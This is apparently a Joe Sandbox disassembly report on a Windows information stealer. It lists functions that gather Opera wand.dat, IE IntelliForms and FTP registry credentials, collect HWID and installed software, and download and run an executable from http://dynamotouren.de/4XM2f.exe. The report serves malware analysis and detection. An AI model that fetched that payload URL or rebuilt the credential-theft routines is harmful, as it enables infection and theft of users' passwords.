Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

.ini, xrefs: 00404DB2
\*.*, xrefs: 00404CE4
*.*, xrefs: 00404CF3
Sites\, xrefs: 00404DE7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$.ini$Sites\$\*.*
API String ID: 3040542784-999409347
Opcode ID: c38aa778b78583dc169d189965d814ac73bb2b3f1bfc0c0d2154c6b94fb836b0
Instruction ID: 53212278e162caab68307d911e5e2161714549b8965e294e943a6f8d6c804a8c
Opcode Fuzzy Hash: c38aa778b78583dc169d189965d814ac73bb2b3f1bfc0c0d2154c6b94fb836b0
Instruction Fuzzy Hash: 283177B0900209AAEF20BF61CC41BEE7765AF80344F1045B7B618B50F1DB7C8ED19E99

Function 0040443E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00404487
GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 0040450C
GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404535
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004045EA
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404609
GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404619
GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 00404627

Strings

GetNativeSystemInfo, xrefs: 004045FE
HWID, xrefs: 00404563
kernel32.dll, xrefs: 004045E5

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
String ID: GetNativeSystemInfo$HWID$kernel32.dll
API String ID: 1787888500-92997708
Opcode ID: 105c1e16622b580bb76dfab31229c71a1d459e57b962d1558819dc564426b42a
Instruction ID: 54daddef61dc0d57abe52263334e6522858395e6adfb0adf8a9ca9f7f261cb3d
Opcode Fuzzy Hash: 105c1e16622b580bb76dfab31229c71a1d459e57b962d1558819dc564426b42a
Instruction Fuzzy Hash: B75143B1A00218BEEF217BA1CC42F9D7A75AF85304F1080BAB749790E1D7B94ED19B59

Function 0040891F Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00408974
lstrcmpiA.KERNEL32(00415055,?), ref: 004089A7
lstrcmpiA.KERNEL32(00415057,?), ref: 004089C1
StrStrIA.SHLWAPI(?,opera,00000000,00415057,?,00415055,?,00000000,?), ref: 00408A06
FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408A34
FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408A47

Strings

\*.*, xrefs: 00408943
wand.dat, xrefs: 00408A0F
opera, xrefs: 004089FB

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: 25419e5fb79d701962baf81079d42c8c31f8be95b4c22e1b7b98c42a2fbdd549
Instruction ID: 1292869286f6aa5ad5b74fb1777e740303319ab58e0dacca6709bcf4709224e2
Opcode Fuzzy Hash: 25419e5fb79d701962baf81079d42c8c31f8be95b4c22e1b7b98c42a2fbdd549
Instruction Fuzzy Hash: B4311070A1021DAAEF21AB61CD42BED77B5AF44344F0040BBB548B51E1DBB89FC09F59

Function 00403FE7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404057
lstrcmpiA.KERNEL32(00415055,?), ref: 00404084
lstrcmpiA.KERNEL32(00415057,?), ref: 004040A1
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040416B
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040417E

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

\*.*, xrefs: 00404017
*.*, xrefs: 00404026

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: bce5784b6e4e3bf5e58f129bfec1ca9c13503689606921eead280abf7e7915bc
Instruction ID: 02411585a0055aa8577641acd59ff52c6a4e0200cbc9bb9f9c255671042f85ff
Opcode Fuzzy Hash: bce5784b6e4e3bf5e58f129bfec1ca9c13503689606921eead280abf7e7915bc
Instruction Fuzzy Hash: BA4173B090021DAADF21AF61CC45AEE3B69AF44344F1044B7BA08B51F1DB7D8ED19B59

Function 0040A54C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0040A556
wsprintfA.USER32 ref: 0040A5D5
lstrlenW.KERNEL32(?,?), ref: 0040A61B
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A65E
LocalFree.KERNEL32(00000000), ref: 0040A695

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A5F3
%02X, xrefs: 0040A59C, 0040A5CC

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: 6687cb46167be396fc73b72414022b3e59988b1b8b774ffa9fd120910d5e0352
Instruction ID: e7da959e478f93c506f5d2c0960b00d418dc9502b93bc1482488adf77b4b25bf
Opcode Fuzzy Hash: 6687cb46167be396fc73b72414022b3e59988b1b8b774ffa9fd120910d5e0352
Instruction Fuzzy Hash: BD414C72C10218EADF11AFE4DC45AEEBB79FF08304F14413AF910B51A1E7798A65CB59

Function 00405024 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405093
lstrcmpiA.KERNEL32(00415055,?), ref: 004050C2
lstrcmpiA.KERNEL32(00415057,?), ref: 004050DC
FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405134
FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405147

Strings

\*.*, xrefs: 00405062

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: 87de5b8274b2caff27159ee54e47f409e4e0e356cc23b78c937b7958fab01303
Instruction ID: 834c9d3c2c78b33e99752c9c166540e6dae11a61d4067108a158aef7cec98cef
Opcode Fuzzy Hash: 87de5b8274b2caff27159ee54e47f409e4e0e356cc23b78c937b7958fab01303
Instruction Fuzzy Hash: 39311C7190061DAAEF20AF61CC42BEE77A9EF04348F0044BBB508A50E1D7789FD19F99

Function 0040A6AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00416390,00000000,00000005,004163A0,?), ref: 0040A6C7
StrStrIW.SHLWAPI(00000000,004163C0), ref: 0040A73E
CoTaskMemFree.OLE32(00000000,00000000,004163C0), ref: 0040A769
CoTaskMemFree.OLE32(00000000,00000000,00000000,004163C0), ref: 0040A777

Strings

(, xrefs: 0040A703

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: cb085d952d8794f266467bdc99fb6f19944fc93456d203f69582ebde3a6e8537
Instruction ID: 789ef5e1365dd3a863c2a9b3f4e84455522ab1bc0cb14278e1797625d710eefd
Opcode Fuzzy Hash: cb085d952d8794f266467bdc99fb6f19944fc93456d203f69582ebde3a6e8537
Instruction Fuzzy Hash: 4E21F834900209EBDF11DFA0D885BDEFB75BF08314F208166E500B62A0D379DAD5DB59

Function 004027AF Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004027EA
GetCurrentProcess.KERNEL32 ref: 004027F4
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402802
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402844
CloseHandle.KERNEL32(00000000), ref: 00402858

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: dde7ea956e658703046f87e9b5c1a38fcc19954aa189818e35cee70bb4b8f4de
Instruction ID: 01ad4f55613d3ea6422f9a86c03aeb724ea44c67199d940a9270a11835675535
Opcode Fuzzy Hash: dde7ea956e658703046f87e9b5c1a38fcc19954aa189818e35cee70bb4b8f4de
Instruction Fuzzy Hash: D4114936A00209EBEB119F94DD49BEE7BB4BB04308F108236A521B51E0D7F89684CB58

Function 0041022F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0041022F
GetUserNameA.ADVAPI32(?,00000101), ref: 0041027F

Strings

cryptimplus, xrefs: 004102A7

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: InitializeNameUser
String ID: cryptimplus
API String ID: 2272643758-1201002197
Opcode ID: 1c3fafd625b67e8e383e866f4f4dafc8120124f5b6aa2911144f85fa4c9997ce
Instruction ID: 317a1e0ec906bcb10e5b0db5419b055487d24f8e909fbf7fefcc2bccf12ee03c
Opcode Fuzzy Hash: 1c3fafd625b67e8e383e866f4f4dafc8120124f5b6aa2911144f85fa4c9997ce
Instruction Fuzzy Hash: 72F058316042119ADB60BBB2AD4AACC3AB05B8834CF10803FB204B45E3DFFC8984962D

Function 0040231D Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 00402326
GetProcAddress.KERNEL32(00000000,?), ref: 00402354

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
Instruction ID: 1dfa1c1e5af10fc35452843b0631d1bd73dd53e789340300057ab7dd164a1ecb
Opcode Fuzzy Hash: c565f1aa3f4fda05442a02a35214380c9171b068020167273cef74c294764032
Instruction Fuzzy Hash: 64F0907320510926D7105539AD4899BAB88E7D3378B145137ED55E62C0E1BDDD81C2A4

Function 004102E0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 004102E3
RevertToSelf.ADVAPI32 ref: 0041030E

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: ExceptionFilterRevertSelfUnhandled
String ID:
API String ID: 669012916-0
Opcode ID: 151815d16c6c1aeafd6ab2c882df4848eca902d9783ddc0210315193b629acf5
Instruction ID: acfa340ed9a42553c751a17bf592bb099c6bee29d1dd991464ace7cdab821f56
Opcode Fuzzy Hash: 151815d16c6c1aeafd6ab2c882df4848eca902d9783ddc0210315193b629acf5
Instruction Fuzzy Hash: D0D0E2341140068ACA357BB2E80A3D93A60AB8930CF44807FA458145A38BBD44CACA3E

Function 00403771 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756

recv.WSOCK32(?,?,00000001,00000000), ref: 004037A3

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 261567ad06b867bf94bed59ea578e3ef6015e5490e128b2dbe9a0ec4694b4c90
Instruction ID: 36e3ef43c85e50d9de3c0b06458be73d01a7fe9bd21fe244589f68d1cd890585
Opcode Fuzzy Hash: 261567ad06b867bf94bed59ea578e3ef6015e5490e128b2dbe9a0ec4694b4c90
Instruction Fuzzy Hash: 840171F034420ABFEB119E50CC81B9A3F6DAB01346F108237BA01BB1D1D775EE558759

Function 0040F731 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

>D@, xrefs: 0040F74B

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: >D@
API String ID: 0-863885849
Opcode ID: 57e17693c71cf3a222b732756e11a97b0aea5370aad12a079381cb740442f73b
Instruction ID: f1efd764739a1e0095d7b3feafbbcd457dd67903410fd2921a3bc984e7b33acd
Opcode Fuzzy Hash: 57e17693c71cf3a222b732756e11a97b0aea5370aad12a079381cb740442f73b
Instruction Fuzzy Hash: 8E11CE32408284EFCB229F04DC02B993F71EB05B10F108033F406A6DE2C33D4965DA4E

Function 004057E5 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405885
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004058B5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405903

Strings

Path, xrefs: 00405826
Server Type, xrefs: 004057F3
Remote Dir, xrefs: 004057F8
Last Server Port, xrefs: 00405859
Last Server Type, xrefs: 0040584F
Last Server Pass, xrefs: 00405868
Server.Port, xrefs: 0040582B
Server.Host, xrefs: 00405835
Server.Pass, xrefs: 0040583A
Host, xrefs: 00405807
Server.User, xrefs: 00405830
Port, xrefs: 004057FD
Last Server User, xrefs: 0040585E
User, xrefs: 00405802
Last Server Path, xrefs: 00405854
Pass, xrefs: 0040580C
ServerType, xrefs: 00405821
Last Server Host, xrefs: 00405863

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: 099759bd5eebce2636a932983d9bc0acd7fcf7c9cfe220f21ca98c520a565fdf
Instruction ID: 347561e4b523bc0a5dc93672fbbdc60ad6bb77937e40ac96be74a297ebc96aca
Opcode Fuzzy Hash: 099759bd5eebce2636a932983d9bc0acd7fcf7c9cfe220f21ca98c520a565fdf
Instruction Fuzzy Hash: F7213B31A80A08FADB116A50CC42FDE7B77AB84B44F608567B508740E9DABD5B90AF4C

Function 00610000 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 233memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 006100AE
VirtualProtect.KERNEL32(00000000,?,00000040,00000040), ref: 00610130
VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 00610322

Strings

", xrefs: 006102AE
@, xrefs: 006102E4
, xrefs: 0061020D
, xrefs: 006102E0
J, xrefs: 006102FC
A, xrefs: 00610304
d, xrefs: 006102BA
zL, xrefs: 00610125
9wt, xrefs: 00610009
@, xrefs: 0061010B
*, xrefs: 006102F8
@, xrefs: 0061002C
Y, xrefs: 006102B6
7, xrefs: 006102B2
J, xrefs: 00610300
e, xrefs: 006102BE

Memory Dump Source

Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd

Similarity

API ID: ProtectVirtual
String ID: $ $"$*$7$9wt$@$@$@$A$J$J$Y$d$e$zL
API String ID: 544645111-258783855
Opcode ID: 9cf56057281cad9d8c28858fbea2c87c5b91fceb659916d5e6e53869f4cde232
Instruction ID: 674e2bae13faf273775d0fa001efd5d4fcf07acf1e16ea5f96ab0976471f6769
Opcode Fuzzy Hash: 9cf56057281cad9d8c28858fbea2c87c5b91fceb659916d5e6e53869f4cde232
Instruction Fuzzy Hash: 75C12570D05288DBEF15CFE8C588BDDBBB2AF58304F288199D8493B385C3B95A85CB55

Function 00401F00 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00401F6D
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401FAD
lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402060
lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402099

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004020D0
GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004020FC
GlobalLock.KERNEL32(?), ref: 0040212C
GlobalUnlock.KERNEL32(?), ref: 0040214B
GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 0040215D
GlobalLock.KERNEL32(?), ref: 0040218D
GlobalUnlock.KERNEL32(?), ref: 004021AC

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00401F63, 00401FBF
DisplayName, xrefs: 00402035
UninstallString, xrefs: 00401FF5

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 4234118056-981893429
Opcode ID: c8d435d750b01384af47649e40dca5ee0034dfe4a2571e3c88f5325bd11c9826
Instruction ID: 160f39242e293253884e826bec42dd5f31ffd203cc24020af9fb355c0f5bab47
Opcode Fuzzy Hash: c8d435d750b01384af47649e40dca5ee0034dfe4a2571e3c88f5325bd11c9826
Instruction Fuzzy Hash: 92613E75D001A8BADB31AB21CD42BEA7679AB44344F0040F7B688B11F1D7BD5FC4AE68

Function 0040FBEC Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401770: GetHGlobalFromStream.OLE32(?,?), ref: 0040177D
Part of subcall function 00401770: GlobalLock.KERNEL32(?), ref: 00401794
Part of subcall function 00401770: GlobalUnlock.KERNEL32(?), ref: 004017AC

wsprintfA.USER32 ref: 0040FC4E
GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FCC1
GetTickCount.KERNEL32 ref: 0040FCD9
wsprintfA.USER32 ref: 0040FCEB
CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FCFC
lstrlenA.KERNEL32(true,?,00000000), ref: 0040FD64
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FD8D

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

%02X, xrefs: 0040FC42
http://dynamotouren.de/4XM2f.exe, xrefs: 0040FBEC, 0040FC01
true, xrefs: 0040FD5F, 0040FD6A
open, xrefs: 0040FD86
MZ, xrefs: 0040FCA5
%d.exe, xrefs: 0040FCDF

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Globallstrlen$wsprintf$CountCreateDirectoryExecuteFromLockPathShellStreamTempTickUnlocklstrcatlstrcpy
String ID: %02X$%d.exe$MZ$http://dynamotouren.de/4XM2f.exe$open$true
API String ID: 3844566713-3815468056
Opcode ID: d7cd4a0a4bc6714c2a85d86dd2bf7c06aba812de7b2a8469bb75f735029e579c
Instruction ID: df3052cfafe379999bc740e25712be6a23053747995945cc34dd6b940c50c795
